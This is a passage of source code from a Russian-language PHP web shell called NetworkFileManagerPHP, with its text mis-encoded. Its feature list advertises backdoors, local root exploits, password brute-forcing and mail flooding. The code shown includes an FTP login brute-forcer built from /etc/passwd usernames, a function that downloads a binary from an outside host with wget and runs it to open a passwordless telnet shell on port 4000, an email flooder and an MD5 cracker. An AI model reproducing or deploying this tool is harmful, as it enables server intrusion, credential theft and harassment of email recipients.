ãäå ýòîò ñàéò õîñòèòñÿ.<br><br>
|
|
 íàïèñàíèè äàííîãî ñêðèïòà áûëè çàäåéñòâîâàíû íåêîòîðûå àâòîðñêèå ðàçðàáîòêè, óâàæàåìûõ ïðîãðàììèñòîâ:<br>
|
|
- èäåÿ èñïîëüçîâàíèÿ àëèàñîâ â öåëÿõ îáëåã÷åíèÿ íàáîðà êîìàíä <b>(Rush)</b><br>
|
|
- ïðîñòåíüêèé Áðóòôîðñåð, êîòîðûé ïðîâåðÿåò ïàðîëü ïî åãî ëîãèíó <b>(TerraByte)</b><br>
|
|
- èäåÿ ñ Mysql, ñïàñèáî ïîëüñêèì ïðîãðàììèñòàì<br>
|
|
- îñòàëüíûå èäåè ìîè <b>(xoce)</b><br>
|
|
- Ñïàñèáî çà òåñòèðîâàíèå ñêðèïòà âñåìó êàíàëó #hack.ru<br><br>
|
|
|
|
<b>Âîçìîæíîñòè NetworkFileManagerPHP</b><br>
|
|
1. Âîçìîæíîñòü ïðîñìàòðèâàòü ôàéëû õîñòèíãà 2-ìÿ ñïîñîáàìè (àêòóàëüíî åñëè îäèí èç íèõ îòêëþ÷åí íà õîñòèíãå, ïðîñìîòð îñóùåñòâëÿåòñÿ ÷åðåç fopen è cmd)<br>
|
|
2. Èñïîëüçîâàíèå àëüÿñîâ, òî åñòü óæå ãîòîâûå êîìàíäû, êîòîðûå ïðîïèñàíû â ðàñêðûâàþùåì ñïèñêå (èíòåðåñíû íîâè÷êàì, êîòîðûå íå çíàþò ëèíóêñà) <br>
|
|
3. Ñêàíèðîâàíèå ñåðâåðà íà îòêðûòûå ïîðòû, ïîêàçûâàåò âñå îòêðûòûå ïîðòû íà ñåðâåðå è èõ ïðåäíàçíà÷åíèå. <br>
|
|
4. Áðóò ñåðâåðà. Âñêðèïò âêëþ÷åí ïðîñòåíüêèé áðóò ñåðâåðà, ïðîâåðêà ïàðîëÿ ïî åãî ëîãèíó.(äàííûå î ïîëüçîâàòåëÿõ áåðóòüñÿ èç ôàéëà /etc/passwd). Âñå ïîäîøåäøèå ïàðîëè çàïèñûâàþòñÿ â ôàéë ñ èìåíåì õîñòèíãà.<br>
|
|
5. Äàìï áàçû mysql. Âîçìîæíîñòü ñäàìïèòü ëþáóþ áàçó Mysql, íàõîäÿùóþñÿ íà ýòîì õîñòèíãå. <br>
|
|
6. Óñòàíîâêà bash shella. Âû ÷åðåç ñêðèïò âû ìîæåòå ïîëó÷èòü ïîëíîöåííûé áàêäîð, êîòîðûé îòêðûâàåò íà 4000 ïîðòó òåëíåò ñîåäèíåíèå. (íåîáõîäèì äëÿ ðóòàíèÿ ñåðâåðà)<br>
|
|
7. Çàùèùåí çàêðèïòîâàííûì ïàðîëåì.<br>
|
|
8. Äîáàâëåíà âîçìîæíîñòü àðõèâàöèè ëþáîé ïàïêè íà õîñòèíãå ñ ïðèñâîåíèåì åé óíèêàëüíîãî èìåíè, êîòîðîå ãåíåðèòñÿ èç 6 ñèìâîëîâ.<br>
|
|
9. Âîçìîæíîñòü ïîñëàòü ñåáå íà ìûëî ëþáîé ôàéë íàõîäÿùèéñÿ íà ñåðâåðå (ìûëî ïðàâèòü â ñàìîì ñêðèïòå íà ñâîå) <br>
|
|
10. Ïðîñìîòð ëîêàëüíî êàðòèíîê (jpg, jpeg,gif,png), âàì òåïåðü íå íóæíû ïàðîëè îò ïîðíî ðåñóðñîâ, âû ìîæåòå âñå ïðîñìîòðåòü ëîêàëüíî!!!<br>
|
|
11. Ïðîñìîòð ëîêàëüíî âèäåî (avi, mpg, mpeg), ÷òîáû íå êà÷àòü âñå ïîäðÿä ñ ïîðíî ðåñóðñîâ, âû ìîæåòå èõ ïðîñìîòðåòü ó ñåáÿ ÷åðåç Windows Media Player!!!<br>
|
|
12. Äîáàâëåíà áàçà ïóáëè÷íûõ ëîêàëüíûõ ýêñïëîéòîâ òàêèõ êàê ptrace, mremap, òàêæå â ñêðèïò âêëþ÷åíû íåêîòîðûå ïîëåçíûå ïðîãðàììêè BNC (ðàçäåë áóäåò ïîñòîÿííî ïîïîëíÿòüñÿ ñ íîâûìè âåðñèÿìè)<br>
|
|
Äîáàâëåíà áàçà ïðèâàòíûõ ýêñïëîéòîâ òîëüêî ëîêàëüíûé ðóò) <br>
|
|
- brk <br>
|
|
- sendmail 8.1.*<br>
|
|
- mremap_pte <br>
|
|
- r00t <br>
|
|
- ku3 <br>
|
|
- ex_bru <br>
|
|
- ptrace/kmod<br>
|
|
- mremap2 <br>
|
|
13. Ïåðåáîð ïàðîëåé MD5 äî 32 ñèìâîëîâ(òåïåðü âàì íå íóæåí ïåðåáîðùèê John The Riper ëþáîé õîñòèíã, ó êîòîðîãî âêëþ÷åíî PHP ñäåëàåò ýòî çà âàñ, ïðè÷åì âñå àáñîëþòíî ëåãàëüíî, ðàáîòàåò äàæå ïðè îáðûâå ñâÿçè, òî åñòü îäèí ðàç çàïóñòèëè è óøëè ñïàòü, ïðîñíóëèñü à ôàéëèê ñ ðàñøèôðîâàííûì ïàðîëåì óæå â äåðèêòîðèè ãäå çàëèò NFM)<br>
|
|
14. Ïîäáîð ïàðîëåé ê FTP ñ ñîçäàíèåì ëèñòà ñ ïàðîëÿìè íàëåòó ( â ëèñò ïàðîëåé âõîäèò:50 ñàìûõ ïîïóëÿðíûõ ïàðîëåé, îíè ïåðâûìè èäóò â ðàñøèôðîâêó, ïîòîì ïîäñòàíîâêà ê ëîãèíó ÷èñåë, íó à ïîòîì ðàíäîìíûå ïàðîëè êîòîðûå ñîçäàþòñÿ ñ èñïîëüçîâàíèåì ãëàñíûõ è ñîãëàñíûõ áóêâ, ïîëó÷àÿ ÷åëîâåêîïîäîáíûå âûðàæåíèÿ, êîòîðûå ìîãóò èñïîëüçîâàòüñÿ â ïàðîëÿõ)<br>
|
|
15. âêëþ÷åí óíèêàëüíûé ñïàìåð ìûë, ðàáîòàþùèé íà ëþáîì õîñòèíãå, âñå áàçû áóäåò ãåíåðèòü ðàíäîìíî, âàëèäíîñòü òàêèõ áàç áóäåò 40-45% ( èñïîëüçóåòñÿ óíèêàëüíûé àëãîðèòì ñîçäàíèÿ èìåí )<br>
|
|
16. âîçìîæíîñòü çàãðóçèòü ëþáîé ôàéë ñ ëþáîãî õîñòèíãà íå ïðèáåãàÿ ê ôóíêöèè wget ( âñå ðåàëèçîâàíî ñðåäñòâàìè php, òåïåðü ìîæíî êà÷àòü ãèãàáàéòàìè.... ðàáîòàåò íå íà âñåõ õîñòèíãàõ )<br>
|
|
17. Óäàëåíèå on-line
|
|
18. Ñîôò íàêàçàíèÿ - ôëóä email, Easy Flood è Hard Flood.
|
|
<b>Äàííûé ñêðèïò ïðåäóïðåæäàåò àäìèíèñòðàòîðîâ õîñòèíãà, ÷òî ïîðà ëàòàòü äûðû.
|
|
Ýòèì ñêðèïòîì ìû ëèøü õîòåëè ïîêàçàòü, ÷òî ñ àïà÷åì øóòêè ïëîõè.</b><br><br>
|
|
<b>Êàê íàñ íàéòè:</b><br>
|
|
Irc server: irc.megik.net:6667 /join #hack.ru<br>
|
|
Óâèäèìñÿ â ñåòè!!!<br></td></tr></table><br></blockquote>
|
|
</td></tr>
|
|
</table>";
|
|
}
|
|
|
|
function exploits($dir) {
|
|
global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
|
|
if (!isset($status)) upload_exploits();
|
|
|
|
else
|
|
{
|
|
|
|
$data = implode("", file($file3));
|
|
$fp = @fopen($file2, "wb");
|
|
fputs($fp, $data);
|
|
$ok = fclose($fp);
|
|
if($ok)
|
|
{
|
|
$size = filesize($file2)/1024;
|
|
$sizef = sprintf("%.2f", $size);
|
|
print "".exec("chmod 777 $public[1]")."";
|
|
print "".exec("chmod 777 $public[2]")."";
|
|
print "".exec("chmod 777 $public[3]")."";
|
|
print "".exec("chmod 777 $private[1]")."";
|
|
print "".exec("chmod 777 $private[2]")."";
|
|
print "".exec("chmod 777 $private[3]")."";
|
|
print "".exec("chmod 777 $private[4]")."";
|
|
print "".exec("chmod 777 $private[5]")."";
|
|
print "".exec("chmod 777 $private[6]")."";
|
|
print "".exec("chmod 777 $private[7]")."";
|
|
print "".exec("chmod 777 $private[8]")."";
|
|
|
|
print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãðóçèëè: <b>ôàéë ðàçìåðîì</b> (".$sizef."êÁ) </font></center></td></tr></table>";
|
|
}
|
|
else
|
|
{
|
|
print "×òî-òî íå òàê.";
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
# FTP-áðóò
|
|
function ftp() {
|
|
global $action, $ftp_server, $filename, $HTTP_HOST;
|
|
ignore_user_abort(1);
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: <b>$ftp_server</b></td></tr>";
|
|
|
|
$fpip = @fopen ($filename, "r");
|
|
if ($fpip) {
|
|
while (!feof ($fpip)) {
|
|
$buf = fgets($fpip, 100);
|
|
ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
|
|
$conn_id=ftp_connect($ftp_server);
|
|
if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
|
|
|
|
$f=@fopen($HTTP_HOST,"a+");
|
|
fputs($f,"$g[1]:$g[1]\n");
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
|
|
|
|
ftp_close($conn_id);
|
|
fclose($f);
|
|
} else {
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
function tar() {
|
|
global $action, $filename;
|
|
set_time_limit(0);
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Àðõèâàöèÿ äàííûõ</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote> ñâÿçè ñ ðàçëè÷íûìè íàñòðîéêàìè ñåðâåðîâ, ÿ íå ñòàë ïîëíîñòüþ àâòîìàòèçèðîâàòü ñêðèïò ïîä êàæäûé ñåðâåð. Âàì òîëüêî îñòàíåòñÿ ïîäïðàâèòü òî÷íûå ïóòè ê ïàïêå äîìåíà è íàæàòü íà ââîä, âñå äàííûå ðàñïîëîæåííûå â âûáðàííîé ïàïêå çààðõèâèðóþòñÿ â àðõèâ tar.gz.<br><br>
|
|
<b>Âíèìàíèå!!!</b><br>Òàê êàê ôàéë <b>passwd</b> ìîæåò áûòü áîëüøèì, òî îòêðûòèå âñåõ ïîëüçîâàòåëåé äàííîãî õîñòèíãà ïîòðåáóåò îïðåäåëåííîãî âðåìåíè.<br><br>
|
|
<b>Ðåêîìåíäóåòñÿ!!!</b><br>Îòêðûòü äàííóþ îïöèþ â îòäåëüíîì îêíå, ÷òîáû ïðè ïðîñìîòðå õîñòèíãà îáðàùàòüñÿ ê íåé è àðõèâèðîâàòü èíôîðìàöèþ êîòîðàÿ âàñ çàèíòåðåñóåò.</blockquote></td></tr>
|
|
</table><br>";
|
|
|
|
$http_public="/public_html/";
|
|
$fpip = @fopen ($filename, "r");
|
|
if ($fpip) {
|
|
while (!feof ($fpip)) {
|
|
$buf = fgets($fpip, 100);
|
|
ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
|
|
$name=$g[1];
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form method='get' action='$PHP_SELF' >
|
|
<tr><td align=center colspan=2 class=pagetitle><b>Àðõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
|
|
<tr>
|
|
<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
|
|
<td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td>
|
|
</tr></form></table>";
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
|
|
# Óñòàíîâêà øåëà
|
|
function bash() {
|
|
global $action, $port_bind, $pass_key;
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Óñòàíîâêà øåëà</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br>Äàííûé øåë óñòàíàâëèâàåòñÿ íà 4000 ïîðò, äîñòóï áåç ïàðîëÿ ïî òåëíåò ñîåäèíåíèþ</td></tr>
|
|
</table><br>";
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b> Äàííûå ïî øåëó çàïèñàíû â ôàéë <u><i>s</i></u></b></td></tr>";
|
|
|
|
echo "<tr><td align=center bgcolor=#FFFFCC><b> ".exec("wget http://vzlomanet.x25.net.ru/adm/exploits/bash/s")."</b> Cêà÷èâàåì...</td></tr>";
|
|
echo "<tr><td align=center bgcolor=#FFFFCC><b> ".exec("chmod 777 s")."</b> Óñòàíàâëèâàåì ïðàâà...</td></tr>";
|
|
echo "<tr><td align=center bgcolor=#FFFFCC><b> ".exec("./s")."</b> Çàïóñêàåì...íà 4000 ïîðò</td></tr>";
|
|
# echo "<tr><td align=center bgcolor=#FFFFCC><b> ".exec("rm s")."</b> Óäàëÿåì <u>s</u>...</td></tr>";
|
|
echo"</table>";
|
|
|
|
}
|
|
|
|
function flud() {
|
|
global $action, $check_box, $status, $emailflood, $kol, $wait, $sizeletter, $subject, $body;
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Ôëóäåð Email</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote>Òàê óæ ïîëó÷èëîñü, ÷òî ðàáîòàÿ â èíòåðíåòå, ìû ÷àñòåíüêî íàðûâàåìñÿ íà ìîøåííèêîâ èëè íàñ ïîäñòàâëÿþò.
|
|
Íî åñëè ìû èìååì ìûëî îáèä÷èêà, òî ìû ìîæåì åìó ïîäãîâíèòü æèòèå. Äëÿ ýòèõ öåëåé è ïèñàëàñü äàííàÿ îïöèÿ. Ñ ïîìîùüþ ýòîé îïöèè âû ñìîæåòå çàôëóäèòü íåãîäÿÿ!!!</blockquote>
|
|
</td></tr>
|
|
</table><br>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=flud' method=post>
|
|
<tr><td align=left valign=top colspan=4 class=pagetitle>
|
|
<b>Ãåíåðàòîð ôëóäà:</b></td></tr>
|
|
<tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
|
|
Äëÿ êà÷åñòâà ôëóäà, ôëóäåð Email, ðàçáèò íà äâå âåðñèè: <br>
|
|
<b>1.</b> Easy Flood - ýòî òóïîé ôëóä, íî áîëåå áûñòðûé, íî åãî ëåãêî óäàëèòü, â ñóòêè çàñèðàåòñÿ ÿùèê îêîëî 100000 ïèñåì, íåêîòîðûå ñåðâåðà ôèëüòðóþò åãî<br>
|
|
<b>2.</b> Hard Flood - ïðîäâèíóòûé ôëóä, íî áîëåå ðåñóðñîåìêèé, ïîääåëûâàåò îò êîãî ôëóä, à òàêæå óìååò åùå êó÷ó âîçìîæíîñòåé</td></tr>
|
|
<tr><td align=left class=pagetitle> <input type='radio' name='check_box' value ='1'> <b>Easy Flood</b></td></tr>
|
|
<tr><td align=left class=pagetitle> <input type='radio' name='check_box' value ='2'> <b>Hard Flood</b></td></tr>
|
|
|
|
<tr><td width=500 align=center colspan=2><input type='submit' value='Íà÷àòü' class=button1 $style_button>
|
|
</td></tr>
|
|
|
|
</form></table>";
|
|
|
|
if ($check_box == "1"){
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=flud&status=easy' method=post>
|
|
<tr><td align=center class=pagetitle colspan=2><font color=#76A8AB><b> .:Easy Flood:. </b></font></b></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Email ãàäà:</td>
|
|
<td align=left width=250><input class='inputbox' type='text' name='emailflood' size=45></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Êîëè÷åñòâî ïèñåì:</td>
|
|
<td align=left width=250><input class='inputbox' type='text' name='kol' size=15></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Èíòåðâàë îòïðàâêè (ñåê):</td>
|
|
<td align=left width=250><input class='inputbox' type='text' name='wait' size=15></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Ðàçìåð ïèñüìà (êá):</td>
|
|
<td align=left width=250><input class='inputbox' type='text' name='sizeletter' size=45></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Òåìà ñîîáùåíèÿ:</td>
|
|
<td align=left width=250><input class='inputbox' type='text' name='subject' size=45></td></tr>
|
|
<tr><td align=left class=pagetitle width=250> Òåêñò ïèñüìà:</td>
|
|
<td align=left width=250><textarea name='body' rows='13' cols='50' class=inputbox> </textarea></td></tr>
|
|
<tr><td width=500 align=center colspan=2>
|
|
<input type='submit' value='Ãåíåðèòü' class=button1 $style_button >
|
|
<INPUT TYPE='hidden' NAME='$chislo'>
|
|
</td></tr>
|
|
</form></table>";
|
|
|
|
|
|
}
|
|
|
|
|
|
if ($status == "easy"){
|
|
error_reporting(63); if($emailflood=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Email ãàäà>')</script>";exit;}
|
|
error_reporting(63); if($kol=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êîëè÷åñòâî ïèñåì>')</script>";exit;}
|
|
error_reporting(63); if($wait=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåðâàë îòïðàâêè>')</script>";exit;}
|
|
error_reporting(63); if($sizeletter=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Ðàçìåð ïèñüìà>')</script>";exit;}
|
|
error_reporting(63); if($subject=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
|
|
error_reporting(63); if($body=="") { print
|
|
"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
|
|
|
|
|
|
$text=strlen($body)+1;
|
|
$sizeletter_kb=(1024/$text)*$sizeletter;
|
|
$sizeletter_kb=ceil($sizeletter_kb);
|
|
|
|
for ($i=1; $i<=$sizeletter_kb; $i++) {
|
|
$msg=$msg.$body." ";
|
|
}
|
|
|
|
|
|
for ($i=1; $i<=$kol; $i++){
|
|
if($emailflood != "") {
|
|
|
|
@mail($emailflood, $body, $msg, "From: $subject");
|
|
$sec = $wait * 1000000;
|
|
usleep($sec);
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function crypte() {
|
|
global $action,$md5a,$sha1a,$crc32, $key,$string;
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Êðèïòîâàíèå äàííûõ</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote>Íà äàííûé ìîìåíò â èíòåðíåòå ñóùåñòâóåò îãîðîìíîå êîëëè÷åñòâî ïðîãðàìì è ñêðèïòîâ, êîòîðûå èñïîëüçóþò ðàçëè÷íûå ìåòîäû øèôðîâàíèÿ ïàðîëåé,
|
|
ñ ïîìîùüþ NFM âû ìîæåòå ïîëó÷èòü äîñòóï ê èçìåíåíèþ ýòèõ äàííûõ, íî áûâàåò íóæíûì èçìåíèòü äàííûå íà ñâîè, äëÿ ýòîãî ÿ âûáðàë ñàìûå ïîïóëÿðíûå ìåòîäû øèôðîâàíèÿ.</blockquote></td></tr>
|
|
</table>";
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
|
|
<tr><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Ïîïóëÿðíûå ìåòîäû øèôðîâàíèÿ, ïîääåðæèâàåìûå áèáëèîòåêîé MHASH:</b></td></tr>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>MD5 </b>(ñàìûé ðàñïðàñòðàíåííûé ìåòîä øèôðîâàíèÿ äàííûõ)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=400> Ðåçóëüòàò: <font color=#ffffcc><b>".md5($md5a)."</b></font></td>
|
|
<td class=pagetitle width=100> Ââîä: <font color=red><b>".$md5a."</b></font></td></tr>
|
|
<tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
|
|
<td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
|
|
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
|
|
<b>SHA1 </b>(òîæå äîâîëüíî ïîïóëÿðíûé ìåòîä øèôðîâàíèÿ äàííûõ)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=400> Ðåçóëüòàò: <font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
|
|
<td class=pagetitle width=100> Ââîä: <font color=red><b>".$sha1a."</b></font></td></tr>
|
|
<tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
|
|
</td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
|
|
|
|
</form></table>";
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
|
|
<tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
|
|
<b>CRC32 </b>(â îñíîâíîì èñïîëüçóåòñÿ ïðè âû÷èñëåíèè êîíòðîëüíûõ ñóìì äëÿ ïðîâåðêè öåëîñòíîñòè äàííûõ, íî è â íåêîòîðûõ ôîðóìàõ â êà÷åñòâå øèôðîâêè ïàðîëåé)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=400> Ðåçóëüòàò: <font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
|
|
<td class=pagetitle width=100> Ââîä: <font color=red><b>".$crc32."</b></font></td></tr>
|
|
<tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
|
|
|
|
</form></table>";
|
|
|
|
}
|
|
|
|
function decrypte() {
|
|
global $action,$pass_de,$chars_de,$dat,$date;
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Äåêîäèðîâàíèå äàííûõ</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote>Âñåì èçâåñòíî, ÷òî md5 íåëüçÿ ìãíîâåííî äåêîäèðîâàòü, òàê êàê èñïîëüçóåòñÿ îäíîíàïðàâëåííîå øèôðîâàíèå (àëãîðèòì õýøèðîâàíèÿ),
|
|
ñîçäàþùåå óíèêàëüíûé îòïå÷àòîê èñõîäíûé ñòðîêè, à èìåííî 128-áèòîâûé (md5).  íàñòîÿùåå âðåìÿ ñ÷èòàåòñÿ íåâîçìîæíûì ïî ýòîìó îòïå÷àòêó
|
|
âîñòàíîâèòü èñõîäíûå äàííûå, îáðàòèâ ïðîöåäóðó, ÿ æå ïîïðîáóþ ïðèìåíèòü ìåòîä «ãðóáîé ñèëû», à èìåííî ïîëíûé ïåðåáîð äî ñîâïàäåíèÿ âõîäíûõ è âûõîäíûõ äàííûõ.</blockquote></td></tr>
|
|
</table>";
|
|
|
|
if($chars_de==""){$chars_de="";}
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Äåøèôðîâêà äàííûõ:</b></td></tr>
|
|
<tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
|
|
<b>Decrypte MD5</b>(ðàñøèôðîâêà õåøà çàâèñèò îò äëèíû ïàðîëÿ è çàíèàåò îïðåäåëåííîå êîëëè÷ñåòâî âðåìåíè)</td></tr>
|
|
<tr>
|
|
<td class=pagetitle width=400 > MD5 õåø: <font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center> <input type=reset value=Î÷èñòèòü class=button1 $style_button></td>
|
|
<tr><td align=left width=400 > <textarea class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
|
|
<td class=pagetitle width=120 valign=top><b>Ïåðåáîð áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
|
|
<a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
|
|
<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
|
|
<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
|
|
<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?><[]{}:¹.,"')>[Ñèìâîëû]</a><br><br>
|
|
<font color=red><b><u>RUS:</u></b></font>
|
|
<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
|
|
<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
|
|
</td></tr>
|
|
<tr><td align=center width=400>
|
|
<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
|
|
</td></tr>
|
|
|
|
</form></table>";
|
|
|
|
|
|
if($_POST[pass_de]){
|
|
$pass_de=htmlspecialchars($pass_de);
|
|
$pass_de=stripslashes($pass_de);
|
|
$dat=date("H:i:s");
|
|
$date=date("d:m:Y");
|
|
|
|
crack_md5();
|
|
}
|
|
}
|
|
|
|
function crack_md5() {
|
|
global $chars_de;
|
|
$chars=$_POST[chars];
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
$chars_de=str_replace("<",chr(60),$chars_de);
|
|
$chars_de=str_replace(">",chr(62),$chars_de);
|
|
$c=strlen($chars_de);
|
|
for ($next = 0; $next <= 31; $next++) {
|
|
for ($i1 = 0; $i1 <= $c; $i1++) {
|
|
$word[1] = $chars_de{$i1};
|
|
for ($i2 = 0; $i2 <= $c; $i2++) {
|
|
$word[2] = $chars_de{$i2};
|
|
if ($next <= 2) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i3 = 0; $i3 <= $c; $i3++) {
|
|
$word[3] = $chars_de{$i3};
|
|
if ($next <= 3) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i4 = 0; $i4 <= $c; $i4++) {
|
|
$word[4] = $chars_de{$i4};
|
|
if ($next <= 4) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i5 = 0; $i5 <= $c; $i5++) {
|
|
$word[5] = $chars_de{$i5};
|
|
if ($next <= 5) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i6 = 0; $i6 <= $c; $i6++) {
|
|
$word[6] = $chars_de{$i6};
|
|
if ($next <= 6) {
